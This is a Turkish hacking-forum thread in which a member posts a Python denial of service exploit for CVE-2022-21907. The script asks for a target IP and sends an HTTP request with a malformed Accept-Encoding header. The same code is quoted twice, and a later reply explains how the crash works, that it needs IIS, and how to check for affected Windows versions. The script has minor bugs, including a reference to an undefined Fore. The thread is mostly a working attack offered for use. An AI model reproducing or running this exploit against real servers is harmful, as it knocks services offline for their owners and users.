CVE-2022-21907 Http Dos Python - Exploit Geliştirme Kulübü

Çokgen

Katılımcı Üye
4 Eyl 2023
412
196
Merhabalar, bugün @'BARBAROS hocamın CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ? konusun exploitini yazmaktayım.

Pythonda requests kütüphanesi ile kodu yazıcağım. Kod güzel gözüksün diye renk özellikleri ekliyeceğim.
Kod:

Python:
import requests
import time

class bccolar():
                YESIL = '\033[92m'
                SARI = '\033[93m'
                KIRMIZI = '\033[91m'
                GRI = '\033[90m'
                MAVI = '\033[34m'

ip = input(bccolar.KIRMIZI +"İp adresini giriniz:\n")

print(Fore.MAVI +"Payload gönderiliyor...")
time.sleep(1)
print(bccolar.YESIL)
poc = requests.get(f'http://{ip}/', headers = {'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\
     BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
     RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
     TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
     OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
     ****************************stupiD, *, ,',})
 
Son düzenleme:

ACE Veen

Uzman üye
4 Şub 2023
1,100
554
Belirsiz
Merhabalar, bugün @'BARBAROS hocamın CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ? konusun exploitini yazmaktayım.

Pythonda requests kütüphanesi ile kodu yazıcağım. Kod güzel gözüksün diye renk özellikleri ekliyeceğim.
Kod:

Python:
import requests
import time

class bccolar():
                YESIL = '\033[92m'
                SARI = '\033[93m'
                KIRMIZI = '\033[91m'
                GRI = '\033[90m'
                MAVI = '\033[34m'

ip = input(bccolar.KIRMIZI +"İp adresini giriniz:\n")

print(Fore.MAVI +"Payload gönderiliyor...")
time.sleep(1)
print(bccolar.YESIL)
poc = requests.get(f'http://{ip}/', headers = {'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\
     BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
     RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
     TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
     OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
     ****************************stupiD, *, ,',})

Daha fazla detay edinmek istiyorsanız link:

veri boyutunu artırmak için accept encoding mi kullanıyorsunuz ?
 
Merhabalar, bugün @'BARBAROS hocamın CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ? konusun exploitini yazmaktayım.

Pythonda requests kütüphanesi ile kodu yazıcağım. Kod güzel gözüksün diye renk özellikleri ekliyeceğim.
Kod:

Python:
import requests
import time

class bccolar():
                YESIL = '\033[92m'
                SARI = '\033[93m'
                KIRMIZI = '\033[91m'
                GRI = '\033[90m'
                MAVI = '\033[34m'

ip = input(bccolar.KIRMIZI +"İp adresini giriniz:\n")

print(Fore.MAVI +"Payload gönderiliyor...")
time.sleep(1)
print(bccolar.YESIL)
poc = requests.get(f'http://{ip}/', headers = {'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\
     BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
     RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
     TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
     OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
     ****************************stupiD, *, ,',})
Selamlar Hocam dememize gerek yok. THT de herhangi bir faaliyetim bulunmıcak.Umarım bu kısımda gelişirsiniz kolay gelsin.
 

'Ranger

Anka Red Team Direktörü
13 Eki 2020
324
488
bu zafiyeti sömüren kod HTTP stack inde bulunan 'Accept-Encoding' gönderilen request sonucu istersen içine 500 tane de a girebilirsin gine çöker. buna ek olarakta windows da ISS server kurulu olması lazım ki her versyonda var diyeceğimiz bir durum yok


bu linkte görebilirisn hangi windows vesyonlarda bu zafiyet var diye kendindeki windows versyonunu kontrol etmen içinde "winver" yazarak görebilirsin eğer güncellemeler açıksa muhtemelen kapatılmıştır. ancak aynı versyonu taşısanda ISS sende kurulu olması lazım etkili olsun diye.

dos için de şu konu incelemeni öneriyorum


burda göreceksin biraz daha anlayabilirsin eğer gine anlamaz isen at yapay zekaya sana satır satır ne iş yaptığını anlatsın
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.